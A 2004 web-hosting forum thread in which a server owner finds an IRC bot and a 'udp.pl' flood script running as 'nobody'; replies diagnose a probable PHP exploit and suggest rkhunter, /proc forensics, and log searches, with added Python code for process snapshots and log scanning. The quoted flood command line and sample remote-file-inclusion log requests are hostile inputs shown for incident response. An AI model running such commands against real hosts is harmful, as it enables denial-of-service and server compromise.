Web Hosting Talk

need help on how to kill irc


jolo2
11-29-2004, 09:49 PM
Hi, I saw this running on my server:

nobody 16421 0.0 0.0 2096 4 ? S Nov29 0:00 sh -c ./stealth irc.undernet.org 53 2>&1 3>&1


How do I kill this? I did kill it actually by using kill and then the PID, but it's still there.

How would I find who is running this?

jolo2
11-29-2004, 09:51 PM
How about this one? What is this?

nobody 15242 47.3 0.0 3116 640 ? R Nov29 348:43 perl udp.pl 193.110.95.1 6667 999999

Aea
11-29-2004, 09:52 PM
nobody is, of course :D </sarcasm>


Are you sure there are no other processes that are there to keep it up? I'm not a Linux expert however ><

jolo2
11-29-2004, 10:00 PM
I asked because I want to know who is running it, or if there is a program that automatically runs this.

Steven
11-29-2004, 10:02 PM
Looks like a PHP script was exploited on your server and someone is using your server for malicious purposes.

dollar
11-29-2004, 10:10 PM
Might want to start by running rkhunter and looking for any problems there.

wKkaY
11-29-2004, 10:13 PM
before you kill them, note down the values in /proc/<pid>/ for cmdline, cwd, environ, exe for forensic purposes.

then, kill -9 them off :)
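The collect-first-then-kill routine wKkaY describes, as an added example (not code from this thread or from any tool named in it). It reads the /proc/<pid>/ entries he lists (cmdline, cwd, environ, exe) plus the UID and parent PID from status, then walks the parent chain, which is how you find out what spawned a "nobody" shell. proc_root is a hypothetical parameter so the functions can be pointed at a copied or constructed /proc tree; build_demo_proc() creates such a tree, modelled on the listing in the first post, purely as constructed sample data.

```python
"""Snapshot /proc/<pid>/ before killing a suspect process (added example).

proc_root is a hypothetical parameter that lets every function run against a
copied or constructed /proc tree instead of the live one.
"""
import os
import signal
import tempfile
from pathlib import Path


def snapshot_process(pid, proc_root="/proc"):
    """Return a dict of the forensic fields for one process directory."""
    base = Path(proc_root) / str(pid)
    if not base.is_dir():
        raise FileNotFoundError(f"no such process directory: {base}")

    # cmdline is NUL-separated argv (the kernel writes a trailing NUL)
    raw = base.joinpath("cmdline").read_bytes().split(b"\0")
    argv = [a.decode("utf-8", "replace") for a in raw if a]

    # environ is NUL-separated KEY=VALUE pairs; only the owner or root may read it
    environ = {}
    try:
        for entry in base.joinpath("environ").read_bytes().split(b"\0"):
            if b"=" in entry:
                key, value = entry.split(b"=", 1)
                environ[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    except PermissionError:
        environ = None

    # cwd and exe are symlinks; readlink still works if the binary was deleted
    def link(name):
        try:
            return os.readlink(base / name)
        except OSError:
            return None

    # Uid: and PPid: lines in status answer "who runs it" and "what started it"
    uid = ppid = None
    for line in base.joinpath("status").read_text().splitlines():
        if line.startswith("Uid:"):
            uid = int(line.split()[1])
        elif line.startswith("PPid:"):
            ppid = int(line.split()[1])

    return {"pid": int(pid), "argv": argv, "cwd": link("cwd"), "exe": link("exe"),
            "environ": environ, "uid": uid, "ppid": ppid}


def ancestry(pid, proc_root="/proc"):
    """Snapshots from pid up to init; the parent of a 'nobody' shell is often the web server."""
    chain = []
    while True:
        snap = snapshot_process(pid, proc_root)
        chain.append(snap)
        if pid == 1 or not snap["ppid"]:
            break
        pid = snap["ppid"]
    return chain


def snapshot_then_kill(pid, proc_root="/proc", sig=signal.SIGKILL):
    """Record first, then kill -9; the record is what you keep for the investigation."""
    record = ancestry(pid, proc_root)
    os.kill(pid, sig)
    return record


def build_demo_proc(root):
    """Constructed sample /proc tree modelled on the thread's listing (not a real capture)."""
    root = Path(root)
    procs = {
        16421: {"argv": ["sh", "-c", "./stealth irc.undernet.org 53 2>&1 3>&1"],
                "ppid": 16400, "uid": 99, "cwd": "/tmp/.x", "exe": "/bin/sh"},
        16400: {"argv": ["/usr/sbin/httpd"], "ppid": 1, "uid": 99,
                "cwd": "/", "exe": "/usr/sbin/httpd"},
        1: {"argv": ["init"], "ppid": 0, "uid": 0, "cwd": "/", "exe": "/sbin/init"},
    }
    for pid, info in procs.items():
        d = root / str(pid)
        d.mkdir(parents=True)
        (d / "cmdline").write_bytes(b"\0".join(a.encode() for a in info["argv"]) + b"\0")
        (d / "environ").write_bytes(b"PATH=/usr/bin:/bin\0HOME=/\0")
        (d / "status").write_text(
            f"Name:\t{info['argv'][0]}\nPPid:\t{info['ppid']}\n"
            f"Uid:\t{info['uid']}\t{info['uid']}\t{info['uid']}\t{info['uid']}\n")
        os.symlink(info["cwd"], d / "cwd")
        os.symlink(info["exe"], d / "exe")
    return root


def demo():
    """Run ancestry() over the constructed tree; returns the three snapshots."""
    with tempfile.TemporaryDirectory() as tmp:
        return ancestry(16421, build_demo_proc(tmp))


if __name__ == "__main__":
    for snap in demo():
        print(snap["pid"], snap["uid"], snap["argv"], snap["cwd"], snap["exe"])
```

On a live box you would call snapshot_then_kill(16421) as root and write the returned list to a file off the compromised host; the cwd entry is usually the most useful field, since it tells you which directory (often a world-writable one) the dropped files live in.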

jolo2
11-29-2004, 10:14 PM
Thanks.. what's rkhunter?

dollar
11-29-2004, 10:18 PM
rkhunter is a nice piece of software that allows you to check your system for common rootkits, signs of rootkits, as well as outdated software.

It most likely won't help too much in this situation, but it doesn't hurt to run it daily.

Installation:

wget http://downloads.rootkit.nl/rkhunter-1.1.8.tar.gz
tar zxfv rkhunter-1.1.8.tar.gz
cd rkhunter
./installer.sh

How to use:

rkhunter -c

jolo2
11-29-2004, 10:44 PM
Thanks everyone. I still need to know though who runs this. I mean, it's my client.

CArmstrong
11-30-2004, 03:34 PM
What do you mean who runs it? It's being run as 'nobody' which, as Steve said, means it's likely to have been placed there via a bad PHP script since Apache runs as nobody. Right Steve?

Maybe grep through your Apache logs for that filename and try to find some activity.
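The log search CArmstrong suggests, as an added example (not code from this thread): it parses Apache common-log-format lines, URL-decodes the request so %XX-encoded names are not missed, and reports every request that mentions one of the filenames from the process list, grouped by client address. SAMPLE_LOG is constructed for the example; the addresses are documentation ranges, and the request paths are invented.

```python
"""Search Apache access-log lines for the filenames seen in the process list (added example)."""
import re
from urllib.parse import unquote

# Common Log Format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) (?P<size>\S+)')

# Names taken from the two processes in the thread; extend with your own findings
WATCHLIST = ("stealth", "udp.pl")

# Constructed sample lines, not a real log
SAMPLE_LOG = """\
192.0.2.10 - - [29/Nov/2004:18:02:11 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.7 - - [29/Nov/2004:18:40:03 -0500] "GET /forum/view.php?id=http://203.0.113.9/udp.pl HTTP/1.0" 200 312
198.51.100.7 - - [29/Nov/2004:18:41:55 -0500] "GET /forum/view.php?id=%2E%2E%2Fstealth HTTP/1.0" 200 0
192.0.2.22 - - [29/Nov/2004:19:00:41 -0500] "POST /login.php HTTP/1.1" 302 -
""".splitlines()


def parse_line(line):
    """Split one CLF line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = unquote(rec["target"])  # undo %XX encoding before matching
    return rec


def find_suspicious(lines, watchlist=WATCHLIST):
    """Return the parsed records whose decoded request mentions a watch-listed name."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        lowered = rec["decoded"].lower()
        matched = [w for w in watchlist if w in lowered]
        if matched:
            rec["matched"] = matched
            hits.append(rec)
    return hits


def by_client(hits):
    """Count hits per client address so the source of the requests stands out."""
    counts = {}
    for rec in hits:
        counts[rec["host"]] = counts.get(rec["host"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_suspicious(SAMPLE_LOG)
    for rec in found:
        print(rec["host"], rec["time"], rec["method"], rec["decoded"], rec["matched"])
    print(by_client(found))
```

Feed it the real file with find_suspicious(open("/path/to/access_log")); the record's "time" field gives you the window to compare against the process start time in the ps output, and the request path tells you which PHP script took the input.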

andreyka
11-30-2004, 03:52 PM
Or just disable some functions in php.ini :)

Stacie
11-30-2004, 03:54 PM
Maybe it's a cronjob? grep -r "udp" /var/cron/tabs/

Steven
11-30-2004, 10:02 PM
I doubt it's a cronjob. It is more than likely an exploited PHP script.

Or just disable some functions in php.ini

That was not very helpful. That is just masking the problem. You need to get down to the root of the issue.